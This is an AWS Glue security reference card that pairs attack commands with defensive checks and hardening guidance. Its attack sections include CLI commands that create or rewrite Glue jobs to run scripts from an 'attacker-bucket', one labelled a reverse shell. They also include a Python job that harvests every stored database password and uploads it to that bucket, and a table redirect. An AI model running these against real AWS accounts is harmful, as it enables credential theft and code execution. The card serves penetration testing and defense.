AWS Glue is a serverless data integration service for ETL jobs and data cataloging. Attackers exploit Glue to execute code via jobs, access sensitive data through crawlers, and leverage the Data Catalog to discover database schemas and connection credentials.
Glue jobs execute PySpark or Python shell scripts with powerful IAM roles. Jobs access S3 data, databases via JDBC connections, and the Data Catalog. Development endpoints provide interactive shell access with the IAM role attached to the endpoint.
Attack note: Creating a Glue job with a privileged IAM role gives arbitrary code execution with that role's permissions.
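From the defender's side, one way to spot a planted or backdoored job is to compare each job's script location against the buckets you expect scripts to live in. The sketch below is a minimal illustration, not a complete control: it assumes the job definitions have already been fetched (for example from a GetJobs response) and that a list of trusted S3 prefixes exists. The bucket name `company-etl-scripts` and the function name are hypothetical.

```python
def jobs_with_untrusted_scripts(jobs, trusted_prefixes):
    """Return (job name, script location) pairs for scripts outside trusted prefixes.

    `jobs` is a list of dicts shaped like the job entries in a GetJobs response.
    """
    prefixes = tuple(trusted_prefixes)
    flagged = []
    for job in jobs:
        location = job.get("Command", {}).get("ScriptLocation", "")
        # Prefixes should end with "/" so that "s3://bucket-evil/" does not
        # pass a check meant for "s3://bucket/".
        if not location.startswith(prefixes):
            flagged.append((job.get("Name"), location))
    return flagged


# Hypothetical sample data for illustration only.
sample_jobs = [
    {"Name": "legit-etl",
     "Command": {"Name": "glueetl",
                 "ScriptLocation": "s3://company-etl-scripts/legit.py"}},
    {"Name": "exfil-job",
     "Command": {"Name": "pythonshell",
                 "ScriptLocation": "s3://attacker-bucket/exfil.py"}},
]

print(jobs_with_untrusted_scripts(sample_jobs, ["s3://company-etl-scripts/"]))
```

A job with no script location at all is also flagged, which is probably the safer default for a review list.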
The Data Catalog stores table schemas, S3 locations, and database metadata. Connections contain JDBC URLs, usernames, and passwords for RDS, Redshift, and external databases. Crawlers automatically discover and catalog data sources.
Attack note: GetConnection returns database credentials in plaintext - the #1 quick win in Glue exploitation
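To gauge how exposed an account is to this, a reviewer can list which connections carry an inline password. The following is a minimal sketch that works on connection records already retrieved (shaped like the `ConnectionList` of a GetConnections response). The sample data and function name are hypothetical, and the `SECRET_ID` property used for the Secrets Manager-backed example is an assumption about how such a connection would look.

```python
def connections_with_inline_passwords(connection_list):
    """Return the names of connections whose properties include a PASSWORD value."""
    flagged = []
    for conn in connection_list:
        props = conn.get("ConnectionProperties", {})
        if props.get("PASSWORD"):
            flagged.append(conn.get("Name", "<unnamed>"))
    return flagged


# Hypothetical sample data for illustration only.
sample_connections = [
    {"Name": "my-rds-connection",
     "ConnectionProperties": {"JDBC_CONNECTION_URL": "jdbc:mysql://...",
                              "USERNAME": "admin",
                              "PASSWORD": "example-only"}},
    {"Name": "secrets-backed",
     # Assumed shape: credentials referenced by secret rather than stored inline.
     "ConnectionProperties": {"JDBC_CONNECTION_URL": "jdbc:mysql://...",
                              "SECRET_ID": "example-secret"}},
]

print(connections_with_inline_passwords(sample_connections))
```

The function returns only connection names, so the audit output does not itself become another copy of the credentials.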
Glue jobs execute arbitrary code with powerful IAM roles. Connections contain database credentials. Data Catalog reveals schema information for entire data infrastructure. Development endpoints provide interactive shell access.
aws glue get-databases
aws glue get-tables --database-name mydb
aws glue get-connections
aws glue get-jobs
aws glue get-dev-endpoints

Key insight: iam:PassRole + glue:CreateJob = arbitrary code execution as any role that Glue can assume. This is a known privesc path in Pacu and Rhino Security research.
aws glue get-connection \
  --name my-rds-connection \
  --query 'Connection.ConnectionProperties'

aws glue create-job \
  --name exfil-job \
  --role arn:aws:iam::123456789012:role/GlueRole \
  --command '{"Name":"pythonshell",
    "ScriptLocation":"s3://attacker-bucket/exfil.py"}'

aws glue start-job-run --job-name exfil-job

aws glue update-job --job-name legit-etl \
  --job-update '{"Command":{"ScriptLocation":
    "s3://attacker-bucket/backdoored-script.py"}}'

aws glue get-tables --database-name mydb \
  --query 'TableList[*].[Name,StorageDescriptor.Location]'

aws glue get-job-runs --job-name my-etl-job \
  --query 'JobRuns[*].[Id,JobRunState,ErrorMessage]'

Glue jobs execute arbitrary code with the job's IAM role. Attackers can create or modify jobs for RCE:
# Create job with reverse shell
aws glue create-job \
  --name backdoor-job \
  --role arn:aws:iam::123456789012:role/GlueRole \
  --command '{"Name":"pythonshell","ScriptLocation":"s3://attacker-bucket/shell.py"}'
# Run the job
aws glue start-job-run --job-name backdoor-job

# Get connection with credentials
aws glue get-connection \
  --name my-rds-connection
# Response includes:
{
  "ConnectionProperties": {
    "JDBC_CONNECTION_URL": "jdbc:mysql://...",
    "USERNAME": "admin",
    "PASSWORD": "SuperSecret123!"
  }
}

Glue connections store database credentials in plaintext. Attackers extract credentials via the GetConnection API or inject malicious code into jobs that harvest credentials from the runtime environment.
# Malicious Python shell job that steals creds:
import boto3, json

glue = boto3.client('glue')
s3 = boto3.client('s3')

# Get all connections with passwords
conns = glue.get_connections()['ConnectionList']
creds = []
for c in conns:
    props = c.get('ConnectionProperties', {})
    creds.append({
        'name': c['Name'],
        'url': props.get('JDBC_CONNECTION_URL'),
        'user': props.get('USERNAME'),
        'pass': props.get('PASSWORD')
    })

# Exfiltrate to attacker bucket
s3.put_object(Bucket='attacker-bucket',
              Key='creds.json', Body=json.dumps(creds))

# Redirect table to attacker-controlled S3
aws glue update-table --database-name mydb \
  --table-input '{
    "Name":"users",
    "StorageDescriptor":{
      "Location":"s3://attacker-bucket/fake-data/",
      "InputFormat":"org.apache.hadoop.mapred.TextInputFormat",
      "OutputFormat":"org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat",
      "SerdeInfo":{"SerializationLibrary":"org.openx.data.jsonserde.JsonSerDe"},
      "Columns":[{"Name":"user_id","Type":"string"}]
    }
  }'
# Now Athena queries against "users" table
# read data from attacker's bucket

{
  "Effect": "Allow",
  "Action": "glue:*",
  "Resource": "*"
}
Full Glue access enables job creation, credential extraction, and RCE via job roles
{
  "Effect": "Allow",
  "Action": [
    "glue:GetDatabase",
    "glue:GetDatabases",
    "glue:GetTable",
    "glue:GetTables"
  ],
  "Resource": [
    "arn:aws:glue:*:*:catalog",
    "arn:aws:glue:*:*:database/*",
    "arn:aws:glue:*:*:table/*/*"
  ]
}
Limited to viewing catalog metadata without job or connection access
{
  "Effect": "Allow",
  "Action": [
    "glue:CreateJob",
    "glue:StartJobRun",
    "iam:PassRole"
  ],
  "Resource": "*"
}
PassRole + CreateJob = arbitrary code execution with any Glue-assumable role
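A quick way to find this combination during a policy review is to test each policy document for Allow statements that cover both actions. The sketch below is a deliberately simplified check under stated assumptions: it only looks at `Effect` and `Action`, and ignores `NotAction`, `Resource`, `Condition`, and explicit Deny statements, so a hit means "look closer" rather than "exploitable". The function names are hypothetical.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    """IAM allows a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def allowed_action_matches(policy, action):
    """True if any Allow statement has an Action pattern matching `action`."""
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            # IAM action names are case-insensitive; "*" and "?" are wildcards.
            if fnmatchcase(action.lower(), pattern.lower()):
                return True
    return False


def allows_glue_job_privesc(policy):
    """Flag policies that allow both iam:PassRole and glue:CreateJob."""
    return (allowed_action_matches(policy, "iam:PassRole")
            and allowed_action_matches(policy, "glue:CreateJob"))


risky = {"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow",
    "Action": ["glue:CreateJob", "glue:StartJobRun", "iam:PassRole"],
    "Resource": "*"}]}
read_only = {"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow",
    "Action": ["glue:GetDatabase", "glue:GetTables"],
    "Resource": "*"}]}

print(allows_glue_job_privesc(risky), allows_glue_job_privesc(read_only))
```

Because the two actions may be granted by different statements, or by different policies attached to the same principal, a fuller review would merge all attached policies before running a check like this.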
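{
  "Effect": "Deny",
  "Action": [
    "glue:GetConnection",
    "glue:GetConnections"
  ],
  "Resource": "*",
  "Condition": {
    "StringNotEquals": {
      "aws:PrincipalTag/team": "data-engineering"
    }
  }
}
Only data engineering team can retrieve connection credentials (GetConnections is denied as well, since it returns the same connection properties)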
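The condition in the Deny statement above is easy to misread, so here is a toy model of how it behaves for different principals. It is only an illustration of the `StringNotEquals` comparison on `aws:PrincipalTag/team`, not an IAM evaluator, and the function name is hypothetical. The point it shows is that a principal with no `team` tag at all is also denied, because a missing key counts as "not equal".

```python
def deny_applies(principal_tags):
    """Model StringNotEquals on aws:PrincipalTag/team for the Deny statement.

    Returns True when the Deny would apply to a principal with these tags.
    The comparison is case-sensitive, and a missing tag is treated as not equal.
    """
    return principal_tags.get("team") != "data-engineering"


print(deny_applies({"team": "data-engineering"}))  # tagged team member
print(deny_applies({"team": "analytics"}))         # other team
print(deny_applies({}))                            # untagged principal
```

In practice this means the tag has to be present on every role that legitimately needs connection details, including the roles that Glue jobs themselves run as.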
Store credentials in Secrets Manager instead of Glue connections. Encrypt with KMS.
JDBC_ENFORCE_SSL=true in connection properties

Use least privilege roles per job. Never share admin roles across jobs.
{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::*:role/GlueJob-*",
  "Condition": {"StringEquals": {
    "iam:PassedToService": "glue.amazonaws.com"
  }}
}

Enable continuous CloudWatch logging for all Glue jobs for audit trail.
--enable-continuous-cloudwatch-log true

Place dev endpoints and jobs in private VPCs without direct internet access.
aws glue create-dev-endpoint \
  --security-group-ids sg-xxx \
  --subnet-id subnet-xxx

Enable encryption at rest for the Data Catalog with customer-managed KMS key.
aws glue put-data-catalog-encryption-settings \
  --data-catalog-encryption-settings '{
    "EncryptionAtRest":{"CatalogEncryptionMode":"SSE-KMS",
    "SseAwsKmsKeyId":"alias/glue-catalog"}}'

Alert on CreateJob, UpdateJob, GetConnection, and unusual StartJobRun patterns.
EventBridge rule on glue.amazonaws.com events:
CreateJob, UpdateJob, GetConnection, CreateDevEndpoint

AWS Glue Security Card • Toc Consulting
Always obtain proper authorization before testing